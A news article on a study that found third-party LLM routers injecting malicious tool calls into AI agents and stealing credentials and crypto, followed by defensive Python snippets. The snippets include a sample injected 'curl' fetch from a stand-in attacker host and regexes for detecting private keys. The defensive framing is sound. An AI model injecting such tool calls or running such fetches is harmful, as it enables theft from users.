Security Risks of AI Routers: New Study Reveals Vulnerabilities in Crypto Transactions
Researchers discover malicious AI agent routers that can steal crypto
Cointelegraph
Researchers from the University of California have identified security vulnerabilities in third-party AI large language model (LLM) routers that can lead to cryptocurrency theft. Their study uncovered multiple attack vectors, including code injection and credential extraction, posing significant risks for developers using AI tools for crypto-related tasks.
- Researchers found 26 third-party AI LLM routers secretly injecting malicious tool calls and stealing credentials.
- Of 28 paid and 400 free routers tested, nine were actively injecting malicious code, and one drained Ether from a researcher-owned private key.
- The study highlights the risks of using unverified third-party routers for sensitive transactions.
- A feature called 'YOLO mode' lets AI agents execute commands without user confirmation, compounding the security risk.
- Developers are advised to harden client-side defenses and avoid transmitting sensitive information through AI agent sessions.
A recent study by researchers at the University of California has revealed alarming security vulnerabilities in third-party AI large language model (LLM) routers that can facilitate cryptocurrency theft. The paper, published on Thursday, outlines four main attack vectors, including malicious code injection and credential extraction.

Co-author Chaofan Shou noted that 26 LLM routers were found to be secretly injecting malicious tool calls and stealing credentials. The team tested 28 paid routers and 400 free routers; nine were actively injecting malicious code, and one drained Ether (ETH) from a researcher-owned private key.

The researchers emphasized how difficult malicious routers are to detect, since routers read secrets in plaintext during normal operation, letting theft blend into legitimate traffic. They also flagged a feature known as 'YOLO mode' in many AI frameworks, which allows agents to execute commands without user confirmation and could turn previously legitimate routers into weapons.

To mitigate these risks, developers are advised to harden client-side defenses and avoid passing sensitive information through AI agent sessions. As a long-term fix, the researchers propose that AI companies cryptographically sign their responses, so clients can verify the integrity of the commands their agents execute.
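The 'YOLO mode' risk points to an obvious client-side countermeasure: gate every agent-proposed command behind explicit human approval. The Python sketch below is illustrative only; the allowlist, function names, and agent integration are assumptions for the example, not anything prescribed by the paper.

```python
import shlex
import subprocess

# Hypothetical allowlist: commands the agent may run without asking.
# Anything else requires an explicit human "yes".
ALLOWLIST = {"ls", "cat", "git"}

def run_tool_call(command: str) -> str:
    """Execute an agent-proposed shell command only after explicit
    user confirmation, unless its binary is on a small allowlist."""
    argv = shlex.split(command)
    if not argv:
        return "refused: empty command"
    if argv[0] not in ALLOWLIST:
        answer = input(f"Agent wants to run: {command!r}. Allow? [y/N] ")
        if answer.strip().lower() != "y":
            return "refused by user"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return result.stdout + result.stderr

if __name__ == "__main__":
    print(run_tool_call("ls -la"))  # allowlisted, runs directly
    # A command a compromised router might inject; this one prompts first.
    print(run_tool_call("curl http://evil.example/payload"))
```

A small allowlist keeps routine read-only commands fast while forcing a human decision on anything a hijacked router might slip into the agent's tool calls.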
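The paper's proposed long-term fix, providers cryptographically signing their responses, could look roughly like the following. This sketch uses Ed25519 from the third-party `cryptography` package; the paper does not prescribe a specific scheme, so the signature algorithm and key-distribution model here are assumptions.

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

def verify_response(public_key, response: bytes, signature: bytes) -> bool:
    """Return True only if `response` carries a valid signature from the
    model provider's published key; any router tampering breaks it."""
    try:
        public_key.verify(signature, response)
        return True
    except InvalidSignature:
        return False

if __name__ == "__main__":
    # Stand-in for the provider's signing key; in practice the client
    # would pin the provider's published public key, not generate one.
    provider_key = Ed25519PrivateKey.generate()
    pub = provider_key.public_key()

    response = b'{"tool_call": "read_file", "args": {"path": "README.md"}}'
    sig = provider_key.sign(response)

    print(verify_response(pub, response, sig))  # True: untouched response
    tampered = response.replace(b"README.md", b"~/.ssh/id_ed25519")
    print(verify_response(pub, tampered, sig))  # False: tampering detected
```

A client that pins the provider's public key can then refuse to execute any tool call a router altered in transit, which is exactly the attack the researchers observed.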
The findings highlight significant risks for developers working with AI tools in cryptocurrency, where a single compromised router can translate directly into financial losses.
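One way to act on the study's advice to avoid passing sensitive information through agent sessions is to scrub anything credential-shaped before a prompt leaves the machine. The patterns below are illustrative assumptions, not from the paper, and will not catch every secret format.

```python
import re

# Rough patterns for secrets that should never transit a third-party
# router. These regexes are illustrative, not exhaustive.
SECRET_PATTERNS = [
    re.compile(r"0x[0-9a-fA-F]{64}"),    # hex-encoded 32-byte private key
    re.compile(r"sk-[A-Za-z0-9]{20,}"),  # common API-key prefix style
    re.compile(
        r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----"
    ),
]

def redact(prompt: str) -> str:
    """Replace anything that looks like a credential before the prompt
    is sent through an untrusted router."""
    for pattern in SECRET_PATTERNS:
        prompt = pattern.sub("[REDACTED]", prompt)
    return prompt

if __name__ == "__main__":
    leaky = "Sign this tx with key 0x" + "ab" * 32 + " please"
    print(redact(leaky))  # "Sign this tx with key [REDACTED] please"
```

Redaction is a backstop, not a fix: since routers see traffic in plaintext, the safer default is to keep signing keys out of agent sessions entirely.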